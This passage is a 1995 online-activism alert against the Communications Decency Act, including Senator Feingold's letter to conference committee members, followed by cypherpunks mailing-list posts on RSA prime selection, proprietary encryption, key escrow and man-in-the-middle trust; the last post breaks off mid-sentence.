			Send a letter to Feingold congratulating him
			for speaking up for free speech.

			Put your business or bulletin board on record
			as supporting free speech and opposing censorship
			for cyberspace!

        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
			   Oct 1, 1995

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
		REDISTRIBUTE ONLY UNTIL November 25, 1995
	       REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS

      Distributed by the Voters Telecommunications Watch (vtw@vtw.org)

________________________________________________________________________
CONTENTS
	The Latest News
	What You Can Do Now
	Letter from Senators Russ Feingold (D-WI) to Committee
	Chronology of the CDA
        For More Information
        List Of Participating Organizations

________________________________________________________________________
THE LATEST NEWS

Many people who have been following the attempts to censor the Internet
may have seen the Senate floor debate.  If you did, you were treated to
the sight of Senators Leahy (D-VT) and Feingold (D-WI) passionately
attempting to explain to 84 members of the Senate exactly just what the
Internet was, and why passing laws against indecency are inappropriate
in this medium.

Both Senators spoke passionately, and for those that understand this
technology, something clicked.  The 16 members that voted against the
censorship legislation will be rewarded by reminders to their voters
about their rational, non-hysterical, positions on free speech at the
end of the year.

In the meantime, we believe that you should congratulate Senators
Feingold on his stand for free speech, and for sticking up for the
net.  Quite often Senator Leahy gets most of the credit for this
position.  Let's be honest, he deserves it because of his long standing
rational approach to our issues.  However it's a big tent, and free
speech can always use another defender. (Directions for contacting
Feingold's office below)

Last week Senator Feingold sent a letter to several committee members
outlining the First Amendment problems with the measures passed by the
Senate (the Communications Decency Act) and the House (the Manager's
Amendment) and asked that these be deleted.  A copy of that letter is
enclosed below, and we thank Senator Feingold's office for making
available an electronic copy (so we didn't have to type it in!).


Remember, send Senator Feingold a thank you.  He's earned it.


[What comes below is unchanged from the last alert]
 
The House and Senate have passed a total of four different pieces of
legislation aimed at dealing with children's access to information on
the Internet.

Each of the four was profiled in BillWatch #13 which you can retrieve
>from  URL:http://www.vtw.org/billwatch/issue.13.html.  Here are the four
pieces of legislation and a short summary of each of them.

HR1978: "Internet Freedom and Family Empowerment Act" (Cox/Wyden) This
bill takes the approach of encouraging industry to provide parents with
tools to restrict their childrens' access to the net.  It contains no
new criminal provisions.  This approach was affirmed by the House
421-4 on August 4, 1995.  (Yes, that's a landslide)

S314: "The Communications Decency Act" (Exon/Coats) This bill makes
many types of constitutionally-protected speech (including lewd,
lascivious, and indecent speech) criminal when used through a
telecommunications device.  This provision was affirmed by the Senate
84-16 on June 14, 1995.

House amendment to HR1555: "Child Protection, User Empowerment, and
Free Expression in Interactive Media Study Act" (Klink/Leahy) This bill
directs the Department of Justice to study and see if there are places
in current law where existing obscenity laws are unenforcible on computer
networks.  This approach was affirmed by a committee voice vote.

House amendment to HR1555: <unnamed>  This amendment was submitted at
the last minute through the Manager's Mark, a collection of several
amendments to HR1555 that were voted on as a block.  This amendment
takes constitutionally-protected speech and criminalizes it when it is
expressed online.  Most legislators had no idea that they voted on this
last amendment; the summary of the Manager's Mark did not mention
these new criminal provisions.  There was no applicable House vote on
*just this* provision.

The House-Senate conference committee now has the task of deciding
which of these are allowed into the final Telecommunications Deregulation
bill for the last floor vote.

________________________________________________________________________
WHAT YOU CAN DO NOW

1. Send Senator Feingold a letter telling him you appreciate him standing
   up for free speech in cyberspace.  Be polite and check your spelling.

   Most importantly, READ HIS LETTER FIRST before you send mail.  He
   took the time to write it, shouldn't you take the time to read it?

   Email or paper mail are recommended, since they will have the least
   impact on the staff.  Telephone calls are less desirable, but
   certainly appropriate if that is the only way that is convenient
   for you.

   The Senator can be reached at:

      P ST Name and Address           Phone           Fax
      = == ========================   ==============  ==============
      D WI Feingold, Russell          1-202-224-5323  na
            502 HSOB                    russell_feingold@feingold.senate.gov
            Washington, D.C. 20510


[This is from the last alert.  We are still collecting signons to the
 letter though, and we don't have nearly enough Internet Service Providers.
 -Shabbir]

2. It's crucial that we tell Congress how their decision in the conference
   committee will affect businesses and bulletin boards in cyberspace.
   We're coordinating a letter from Internet businesses and bulletin
   boards to explain to Congress just what these poorly-drafted regulations
   will mean to them.

   Read the electronic business and bulletin board letter below.  You
   can also find it at:

	Gopher:  gopher -p1/vtw/exon gopher.panix.com
	WWW URL: http://www.vtw.org/cdaletter/
	Email  : Send mail to files@vtw.org with "send cdaletter" in the
		 subject line.
	
3. If you work for a business that uses bulletin boards or public networks,
   convince the owners to sign onto the letter.  Companies that should sign
   this include Internet service providers, Web designers (big and small),
   Internet consultants and trainers, Internet restaurants and bars,
   software companies that develop Internet-related software, companies
   that advertise or publish through the Internet or bulletin boards, writers
   who publish through the Internet, and many others!

   If you belong to a bulletin board, ask the sysop if he or she will sign
   onto the letter.

4. Ask the BBS sysop or the business owner to mail in the following
   information to vtw@vtw.org:

	Business name
	Owner or officer name
	Address
	Email address
	Phone number
	Description of business and anything else relevant

   Here's an example:
   
   $ Mail vtw@vtw.org

   My business would like to signon to the business and bbs letter.
   We are:

   	Ed's Xcellent Online Node (EXON)
   	J.J. Exon, Owner
   	2323 Decency Road, Nebraska 10000-0000
   	(402) 555-1212
   	jj@exon.net

   	Ed's Xcellent Online Node is based in Nebraska and provides Internet
   	service to many thoughtful and free-speech loving Nebraskans.
   	We provide Internet access to over 1,500 residents and 400
   	businesses.  We employ 35 full time employees.

   -James
   ^D
   Mail sent!
   $

5. If you don't subscribe to a BBS or have an affiliation with a business
   that uses public networks, but belong to a professional organization
   or an advocacy group, consider sending Congress the ACLU letter included
   below with your local group's name on it.  Simply replace the material
   in parentheses with your own information.

6. Relax!  You just did a lot of good with only email as a tool.  Isn't
   that great?

________________________________________________________________________
LETTER FROM SENATOR RUSS FEINGOLD (D-WI)

[NOTE: This letter was sent to:

	Sen. Larry Pressler
	Sen. Fritz Hollings
	Rep. Thomas Bliley
	Rep. John Dingell
	House Committee on Commerce
	Senate Committee on Commerce, Science, & Technology

 All of these individuals have a hand in the shaping of the conference
 committee process that will define the outcome of the Telecommunications
 Deregulation bill, and therefore, the Internet censorship legislation.

 Each letter was identical, so we have only included one here.

-Shabbir]

Tuesday September 26, 1995


The Honorable Thomas Bliley
Chairman, Committee on Commerce
U.S. House of Representatives
Washington, D.C. 20515

Dear Chairman Bliley,

Soon your Committee will begin Conference deliberations on H.R. 1555
and S.652, telecommunications reform legislation, with members of the
Senate Committee on Commerce, Science and Transportation.  During those
deliberations, I urge you to strike the potentially unconstitutional
provisions regarding on-line indecency contained in both the Senate and
House versions of this legislation.

The Exon-Coats amendment, added to S. 652 on the Senate floor, included
provisions which I believe would violate the First Amendment rights of
Internet users and have a chilling effect on further economic and
technological development of this exciting new form of
telecommunications.  Specifically I have objected to the indecency
provisions of S. 652 for the following reasons:

1)  Indecent speech, unlike obscenity, is protected under the First
    Amendment to the U.S. Constitution;

2)  An outright ban on indecent speech on computer networks is not the
    "least restrictive means" of protecting children from exposure to
    such speech on the Internet. There are a number of existing tools
    available today to allow parents to protect their children from
    materials which they find inappropriate;
 
3)  A ban on indecent speech to minors on the Internet will unnecessarily
    require adults to self censor their communications on the Internet;

4)  Since "indecency" will be defined by community standards, protected
    speech by adults will be diminished to what might be considered decent
    in the most conservative community in the United States and to what
    might be appropriate for very young children; 

5)  The "on-line indecency" provisions will establish different standards
    for the same material that appears in print and on the computer screen.
    Works that are completely legal in the bookstore or on the library shelf
    would be criminal if transmitted over computer networks;

6)  The Supreme Court has ruled that the degree to which content can be
    regulated depends on the characteristics of the media.  The unique
    nature of interactive media must be considered when determining how
    best to protect children.  S. 652 ignores the degree to which users
    have control over the materials to which they are exposed as well as
    the decentralized nature of interactive technology which liken it more
    to print media than broadcast media.

Section 403 of H.R. 1555, known as the Hyde amendment, raises equally
serious concerns with respect to the First Amendment and appears
antithetical to other provisions contained in the House Bill.  The
prohibitions against on-line indecency contained in the Hyde language
will have a similar chilling effect on the on-line communications of
adults.  The Hyde amendment is also inconsistent with the more
market-oriented and less intrusive provisions of Sec. 104 of H.R. 1555,
the On-Line Family Empowerment Act introduced by Congressmen Cox and
Wyden, as adopted by the House.  Section 104 recognizes that First
Amendment protections must apply to on-line communications by
prohibiting FCC content regulation of the Internet.  The Cox/Wyden
provisions also promote the use of existing technology to empower
parents to protect their children from objectionable materials on the
Internet, and encourages on-line service providers to self-police
offensive communications over their private services.

In addition, the Hyde amendment is incompatible with Section 110 of
H.R. 1555, which demands a report by the Department of Justice (DOJ) on
existing criminal obscenity and child pornography statutes and their
applicability to cyber-crime.  Sec. 110 also requires an evaluation of
the technical means available to enable parents to exercise control
over the information that their children receive on the Internet.
Perhaps most significantly, Sec. 110 embraces the application of First
Amendment speech protections to interactive media.  H.R. 1555, while
embracing the principles of restraint with respect to new criminal
sanctions on protected speech and the promotion of a free-market
parental empowerment approach, simultaneously ignores both of those
axioms with the Hyde provision.  By imposing new criminal sanctions on
indecent speech and amending existing criminal statutes, the Hyde
amendment rushes to judgement before the DOJ study has even begun.

Recently, the Senate Judiciary Committee held the first-ever
Congressional hearing on the issue of cyberporn.  Based on the
testimony of the witnesses, which included parents as well as victims
of cyberporn, it became clear that the objectionable communications on
the Internet are already covered by existing criminal statutes.  The
concerns raised at the hearing centered upon trafficking of child
pornography, the proliferation of obscenity, and the solicitation and
victimization of minors via the Internet.  However, those offenses are
already violations of criminal law.  Indeed, recent press accounts
indicate that law enforcement officers are already aggressively
prosecuting on-line users for violations of criminal law relating to
obscenity and child pornography.

It is critical that we use law enforcement resources to prosecute
criminal activity conducted via the Internet and not be distracted by
the issue of indecency which has not been identified as a serious
concern by users or parents.  It was clear, during our recent Senate
Hearing, that the witnesses' concerns about the Internet did not relate
to indecent speech or the so-called "seven dirty words".  It is
incumbent upon Congress to wait for the results of the study required
by H.R. 1555 before embracing overly restrictive, potentially
unnecessary and possibly unconstitutional prohibitions on indecent
speech contained in both versions of telecommunications reform
legislation.

I urge the Conference Committee to reject the Exon/Coats and Hyde
provisions during your deliberations and to maintain the Cox/Wyden
amendment adopted overwhelmingly by the House of Representatives.  If
the United States is to ever fully realize the benefits of interactive
telecommunications technology, we cannot allow the heavy hand of
Congress to unduly interfere with communications on this medium.

Thank you for your consideration of this very important matter. 

Sincerely,




Russell D. Feingold
United States Senator

cc:  Members, Committee on Commerce

________________________________________________________________________
CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

Sep 26, '95	Sen. Russ Feingold urges committee members to drop
		Managers Amendment and the CDA from the Telecommunications
		Deregulation bill
Aug  4, '95	House passes HR1555 which goes into conference with S652.
Aug  4, '95	House votes to attach Managers Amendment (which contains
		new criminal penalties for speech online) to
		Telecommunications Reform bill (HR1555).
Aug  4, '95	House votes 421-4 to attach HR1978 to Telecommunications
	 	Reform bill (HR1555).
Jun 30, '95	Cox and Wyden introduce the "Internet Freedom and Family
		Empowerment Act" (HR 1978) as an alternative to the CDA.
Jun 21, '95     Several prominent House members publicly announce their
                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
                reform bill (S 652) by a vote of 84-16.  The Leahy bill
                (S 714) is not passed.
May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
                in the House with the Leahy alternative attached to it,
                thanks to Rep. Ron Klink of (D-PA).  The Communications
                Decency Act is not attached to it.
Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
                the Exon/Gorton bill, which commissions the Dept. of
                Justice to study the problem to see if additional legislation
                (such as the CDA) is necessary.
Mar 23, '95     S314 amended and attached to the telecommunications reform
                bill by Sen. Gorton (R-WA).  Language provides some provider
                protection, but continues to infringe upon email privacy
                and free speech.
Feb 21, '95     HR1004 referred to the House Commerce and Judiciary committees
Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
Feb  1, '95     S314 referred to the Senate Commerce committee
Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________
FOR MORE INFORMATION

Web Sites
        URL:http://www.vtw.org/exon/
        URL:http://epic.org/
        URL:http://www.eff.org/pub/Alerts/
        URL:http://www.cdt.org/cda.html
	URL:http://outpost.callnet.com/outpost.html

FTP Archives 
        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
        URL:ftp://ftp.eff.org/pub/Alerts/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon
        URL:gopher://gopher.eff.org/11/Alerts

Email:
        vtw@vtw.org (put "send alert" in the subject line for the latest
		alert, or "send cdafaq" for the CDA FAQ)
        cda-info@cdt.org (General CDA information)
        cda-stat@cdt.org (Current status of the CDA)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.


American Communication Association * American Council for the Arts *
Arts & Technology Society * Association of Alternative Newsweeklies *
biancaTroll productions * Boston Coalition for Freedom of Expression *
Californians Against Censorship Together * Center For Democracy And
Technology * Centre for Democratic Communications * Center for Public
Representation * Citizen's Voice - New Zealand * Cloud 9 Internet
*Computer Communicators Association * Computel Network Services *
Computer Professionals for Social Responsibility * Cross Connection *
Cyber-Rights Campaign * CyberQueer Lounge * Dutch Digital Citizens'
Movement * ECHO Communications Group, Inc. * Electronic Frontier Canada
* Electronic Frontier Foundation * Electronic Frontier Foundation -
Austin * Electronic Frontiers Australia * Electronic Frontiers Houston
* Electronic Frontiers New Hampshire * Electronic Privacy Information
Center * Feminists For Free Expression * First Amendment Teach-In *
Florida Coalition Against Censorship * FranceCom, Inc. Web Advertising
Services * Friendly Anti-Censorship Taskforce for Students * Hands
Off!  The Net * Human Rights Watch * Inland Book Company * Inner Circle
Technologies, Inc. * Inst. for Global Communications * Internet
On-Ramp, Inc. * Internet Users Consortium * Joint Artists' and Music
Promotions Political Action Committee * The Libertarian Party *
Marijuana Policy Project * Metropolitan Data Networks Ltd. * MindVox *
MN Grassroots Party * National Bicycle Greenway * National Campaign for
Freedom of Expression * National Coalition Against Censorship *
National Gay and Lesbian Task Force * National Public Telecomputing
Network * National Writers Union * Oregon Coast RISC * Panix Public
Access Internet * People for the American Way * Republican Liberty
Caucus * Rock Out Censorship * Society for Electronic Access * The
Thing International BBS Network * The WELL * Voters Telecommunications
Watch

(Note: All 'Electronic Frontier' organizations are independent entities,
 not EFF chapters or divisions.)

________________________________________________________________________
	End Alert
========================================================================



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 14:57:34 PDT
To: cypherpunks@toad.com
Subject: Picking Random Primes
Message-ID: <ac9aef322a02100497ac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:24 PM 10/6/95, Patrick Horgan wrote:

>Given the difficulty of finding primes, how likely do you think it is that
>given one of the well known methods and finding the first 1024 bit prime
>that pops out would give you an effective attack?

What is the "difficuly of finding primes"? They are actually very easy to find.

A few comments:

First, the "1024 bit prime" is misleading. The 320+ decimal digit modulus
used in RSA has two prime factors of roughly 160 digits each.

Second, the process of finding the primes p and q involve avoiding "weak"
moduli, such as where p and q are very close together. To avoid this, a
common situation is for p to be roughly 159 digits and q to be 161 digits.

Third, these are _really, really_ big numbers! There are about 10^158
primes between 10^159 and 10^161. roughly. (The rule of thumb, given by
Sterling's formula, is that about 1% of all 100-digit numbers are prime,
about 0.1% of all 1000-digit numbers are prime, etc.) As there are only
about 10^75 particles in the entire universe, this gives about 10^83 primes
for every particle in the entire universe!

Fourth, the standard way to find the primes p and q is to pick a random
number of the approximate starting size and then iterate up, testing for
primality. As the above approximation shows, one doesn't have to make too
many tests before a number is confirmed to be very likely to be prime. (I
say "very likely" because the most popular primality testing routines have
a very small chance of saying a composite number is prime, when it isn't.
Cf. math books for details on this, and why it is essentially irrelevant to
us.)

Fifth, there are clearly some really good ways to pick a 150 or 160 digit
number to start testing from. For example, a 10-sided die, or a pair of
traditional dice (ignoring 11 and 12) could be rolled 150 times, with the
resulting number used to start the process. Not bloody likely that any
collisions in such a choice process will occur before the heat death of the
universe.

(There are faster ways, using the random sources we so often talk about,
including keyboard poundings,  mouse swirlings, audio input, radioactive
decay, diode noise, etc., but I wanted to make the point with the rolled
die so nobody will ask "Yeah, but what if people picked the same starting
point?" They won't.)

By the way, all of the "entropy" or "randomness" in the p and q primes lies
in the initial seed for the search for the first prime larger than the
seeds, as the algorithm is completely deterministic once the seed has been
picked. (And fast, too.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 6 Oct 95 12:38:54 PDT
To: privsoft@ix.netcom.com (Steve)
Subject: Re: Graphic encryption
In-Reply-To: <199510061517.IAA10725@ix5.ix.netcom.com>
Message-ID: <199510061938.PAA16649@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Steve O. writes:
> I am currently working for a company that has a graphic encryption 
> product called PrivaSoft. 
[...]
> Also if any of ya'll are famillar with graphic encryption, I am looking 
> for opinions as to its strengths / weaknesses.

Funny you should ask. A week or so ago someone mentioned PrivaSoft's fax
encryption software here. The promotional material we saw mentions two points
about the product which I believe were seen as bad omens by many of us on the 
cypherpunks list. To wit:

(1) PrivaSoft uses a proprietary encryption algorithm

Cryptanalysis is a challenging task. Comparatively little is known about how
to prove, in some formal sense, that any given cryptographic algorithm is
strong. Most people in the field have reached the conclusion that the test of
time is the best true measure of the cryptographic strength of an algorithm.
Until plenty of people have pounded on the algorithm, you can't really have
much confidence about it.

Moe concretely: If you believe your algorithm is strong, then you have no
reason to fear an expert review, and should in fact welcome it. On the other
hand, if you won't reveal your algorithm, we have little basis for trusting
our confidential data to it. 

(2) PrivaSoft has been approved for export by the U.S. Govt.

As you probably know, the U.S. Government restricts the export of strong
cryptography (using the ITARs), with some notable exceptions for bankers
and authentication-only deployments. PrivaSoft isn't selling strictly to
banks, and attempts to protect confidentiality. Ergo, the government doesn't
think you're using strong cryptography. 

Case in point: the separate U.S. and international versions of Netscape 
Navigator. The exportable version uses the RC4 algorithm (as part of the SSL
protocol) with an effective key length of 40 bits, while the domestic version
uses 128 bits. Some people here made the news a short while ago with a 
concrete demonstration of the inadequacy of the shorter key length. That was
proof-of-concept for an idea already fairly well-accepted in cryptographic
circles.

PrivaSoft looks worse than the int'l. version of Navigator. At
least with the browser, Netscape had levelled with everyone up front and
used a reasonably well-known published algorithm. Thus we had good reason to
believe it provides a non-trivial level of security. The C'punks Key
Cracking Ring showed just what it takes to cross that line. But we have
absolutely _no_ evidence that PrivaSoft does anything hard to break at all.

Bottom line: you have to release the specs. of your algorithm, to a panel
of experts under NDAs or (preferably) to the public, to convince us that 
PrivaSoft offers us real security.

[I highly recommend Schneier's _Applied Cryptography_, 2nd edition due RSN
from Wiley & Sons, as a comprehensive reference guide if you're thinking
seriously about these issues. ISBN 0-471-59756-2]

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 6 Oct 95 16:31:25 PDT
To: cypherpunks@toad.com
Subject: Re: Open Market, Inc. Announcing security products
In-Reply-To: <199510061747.NAA13827@cmyk.warwick.com>
Message-ID: <3075BB6D.3A91@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Harry S. Hawk wrote:
> 3) Offer a free upgrade problem for people who have a server that has
>    had a security breach. They can download a known secure server.

  And how do you define a "known secure server"?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MINITERS@citadel.edu
Date: Fri, 6 Oct 95 13:39:13 PDT
To: cypherpunks@toad.com
Subject: Who knows the story on Elementrix OTP??
Message-ID: <01HW4KOF4LB40000UE@CITCS.Citadel.edu>
MIME-Version: 1.0
Content-Type: text/plain


Aclaim is being made to having a technique for utilizing OTP with a spiffy key
generation technique that requires no transmission over an unsecure link.
Who knows the details of the approach and the particulars on the developers?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 6 Oct 95 16:42:47 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Open Market, Inc. Announcing security products
In-Reply-To: <3075BB6D.3A91@netscape.com>
Message-ID: <199510062337.QAA17601@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I think they mean "our server" by "known secure server."

	I'm getting quite sick of people who think their system is
secure just because it hasn't been broken.


> 
> Harry S. Hawk wrote:
> > 3) Offer a free upgrade problem for people who have a server that has
> >    had a security breach. They can download a known secure server.
> 
>   And how do you define a "known secure server"?
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 6 Oct 95 13:49:56 PDT
To: cypherpunks@toad.com
Subject: DOCKMASTER II is coming!
Message-ID: <9510062045.AA09504@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


Date:  Fri, 6 Oct 95 16:14 EDT
Subject:  DOCKMASTER II is coming!
Forum-Transaction:  [2279] in the >site>forum_dir>bb meeting
Transaction-Entered-By:  Lanenga.PILOT@DOCKMASTER.NCSC.MIL
Transaction-Entered-Date:  22 Sep 95 12:47 EDT

                        COMPUTER SECURITY, IT'S FOR YOU!

The DOCKMASTER II Program Management Office, Y407, is pleased to post the
first official notice concerning DOCKMASTER II, an NSA-sponsored information
system in support of the INFOSEC community.  DOCKMASTER II will provide an
information sharing capability to its users.  This will include the supporting
functions of a data repository and information dissemination.  The system will
protect itself and the information it contains, which will range from
Unclassified to National Secret, including Proprietary information.

WHAT IS DOCKMASTER II?

DOCKMASTER II provides a UNIX Open Architecture with electronic mail, bulletin
boards, file transfer, and data packaging and sharing tools.

The system is built on the Data General Operating System (UNIX System V) and
utilizes the Informix On-Line/Secure Database.  Both the operating system and
database are currently in the Trusted Product Evaluation Process (TPEP) at the
B2 level of trust.  The system is comprised of Commercial-Off-The-Shelf
(COTS) software, with some developmental software to provide user-friendly
interfaces.  A fast, flexible, and expandable hardware platform is
implemented.

WHAT ARE SOME OF THE SPECIFICS OF DOCKMASTER II?

-User-Friendly (Graphical, Menu Driven, or Command Line) Interfaces
-E-Mail
-Bulletin Boards (Forums)
-File Transfer Protocols (FTP, Kermit, X-Modem, Y-Modem)
-Connections via MILNET/INTERNET/TYMNET or Dial-in
-Database (INFORMIX On-Line/Secure)
-Reference Library
-Document Publishing (Framemaker)
-Project Management Tool (Autoplan II)
-On-Line Tutorial
-System-wide Help Facility
-Provides infrastructure for multi-level secure access
-Replaces the current unclassified DOCKMASTER system

WHAT IS THE STATUS OF DOCKMASTER II?

-System Requirements Review, and Preliminary and Critical Design Reviews
 have been completed successfully
-System Evaluation is occurring
-Software Integration & Test and System Integration & Test are occurring
-Initial Operating Capabilty (IOC) - Unclassified and Proprietary data only
 is scheduled for Spring 1996
-Final Operating Capability (FOC) - Multilevel data up to Secret, is 
 scheduled for late 1996.

HOW TO LEARN MORE ABOUT DOCKMASTER II?

The DOCKMASTER II Program Management Office offers a briefing to all
interested organizations or individuals.  DOCKMASTER II will have many
capabilities to offer our fellow co-workers at NSA as well as their
counterparts in Government and Industry.  Please contact us to arrange a
briefing; we are excited about sharing DOCKMASTER II's capabilities.  Also
please feel free to ask any questions about DOCKMASTER II.

For briefings, please contact Daphne Willard (Willard at DOCKMASTER.NCSC.MIL)
For questions: Devolyn Arnold (DArnold at DOCKMASTER.NCSC.MIL) 
or call the Dockmaster II Program Management Office at (410) 684-7276





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 6 Oct 95 08:50:25 PDT
To: privsoft@ix.netcom.com
Subject: Re: Graphic encryption
Message-ID: <9510061548.AA29777@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> I am currently working for a company that has a graphic encryption 
> product called PrivaSoft. I was wondering if there were other products 
> or engines that also provide graphic encryption. (graphic encryption is 
> the use of a encryption algorythm to scramble an image taken of a 
> document.) 

Is there anything particular in graphic encryption? I usually encrypt
graphics and document images as regular files with regular encryption...

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 7 Oct 95 02:25:03 PDT
To: jim@acm.org (Jim Gillogly)
Subject: Re: Where is text of wiretap bill
In-Reply-To: <199510061524.IAA02409@mycroft.rand.org>
Message-ID: <951006.165006.5n9.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jim@acm.org writes:

> An assistant director of the FBI, William Baugh, spoke recently at the ICI
> conference in DC.  He said he hoped American industry would be cooperative
> in making the voluntary compliance with TESSERA or other GAK widespread,
> because if it doesn't happen then they would need to come back and get
> more Congressional action, and "we found the coercive solution we had to
> use for Digital Telephony very draining."

I shouldn't be surprised to see this, but it does strike me as pretty
blatant.  Aren't the Fibbies supposed to be putting a less threatening
spin on this stuff?  Or are the gloves coming off?
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHWk7Bvikii9febJAQGe/AP/YmP1YeMNbWx5MbfLw7d7eCCjDJz8ViJw
hgrdPcaRneD6ecq6x+wDqRIDg6ENO4bUc/a8QEwYTZoZmr0dZ0pX078uG8XHiyAR
OfUkAHMPKMwOPUCNKRKsUsRJUTIt8qxNAF2yv+BKLMPjz2uX73WYtr2eWxM3NXRD
X0pp0j1wV/Q=
=qs6H
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Fri, 6 Oct 95 09:05:53 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
Message-ID: <2264.9510061657@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


This discussion can be divided into two separate situations. The first of
which is exemplified perfectly by Hal:

hfinney@shell.portal.com writes:
>m5@dev.tivoli.com (Mike McNally) writes:

> >hfinney@shell.portal.com writes:
> > > This situation with the MITM is actually about the same as if you were
> > > communicating insecurely in the first place.  You are exposed to all of
> > > the same risks.

> >The only way to achieve the level of security offered by physical face
> >to face communication with a person is to have a physical face to face
> >conversation at some point.  If you only ever communicate via
> >electronic means, you are always subject to the risk of dealing with a
> >synthetic entity.  (I think.)

>I don't think so, or at least the risk can be minimized much more than in
>the model where we just say that we're communicating with keys, therefore
>a MITM is perfectly legitimate because it's just a matter of who holds
>the keys.  Suppose I want to talk to PC Magazine columnist John Dvorak.
>Suppose I find a VeriSign certificate for his key, with his name and
>employment information.  I've never met him.  We've never had a face to
>face conversation.  Yet I claim I can communicate with considerable
>security with Dvorak using this certificate, certainly more than if I
>just use any old key which is lying around with his name on it, one which
>may be owned by a MITM.

Here the wish is to communicate with a 'real' person. A person that actually
exists and has an in-built reputation that is separate from his key. This is
very much a real life situation and is very similar to the first time that you
meet someone - it is very hard to know that someone is who they say that they
are, few people ask for ID and even ID is possible to fake (an old key that is
actually owned by a MITM). In this case the person is known (of) and not the
key - therefore it makes sense to attempt to ensure that the link between the
key and the person is a strong (trustworthy) as possible.

However this is not the case in the second situation:

I could say that know that I enjoy reading mail from some people on the list,
that I agree with some people on the list or that some people on the list hold
very strong opinions on certain subjects. However this would not be correct as
I have not met anyone else on the list in person (we do not all live in the US).
It would be more correct to say that I enjoy reading mail from some addresses
on the list (etc.) - I have no real idea whether hfinney@shell.portal.com is Hal
or actually Tim expressing different views. If I mail Hal therefore I am
actually mailing the entity that sends mail to the list from that address and
I would do so being pretty sure that I was communicating with the person who
mails here - but I would have no idea whether he is actually male, female, blond,
brunette etc apart from what I chose to believe from others. 

Now mail is far easier to fake/intercept than a digital signature/encryption - at
least I hope so. Therefore if Hal where to sign all of his messages I could check
the signatures with a public key obtained from anywhere at all and if they passed
then I could be confident that the messages were all written by the entity with
control of the secret part of the key - at least far more confident than I am at
all of the mail from hfinney@shell.portal.com actually comes from there. So instead
of me getting the idea that hfinney@shell.portal.com posts interesting messages
I get the idea that the holder of the secret key posts interesting messages - I
would probably still use the mail address as keys are less convenient with current
mail readers but that is an implementation problem. Hals reputation is therefore
transfered to they key - no matter where I got the key from. So if I send encrypted
mail to the person with the private part of Hal's key I can be sure that it can
only be read by the person who actually sent the messages pertaining to be from Hal.

So the MITM problem is 'defined away' in the case where a reputation grows with a
key but is still a major problem where you want to transfer a ready made reputation
to a key (as in the first example). In effect the key becomes a pseudonym and you
can be sure of communicating with the pseudonym safely but can not be sure of
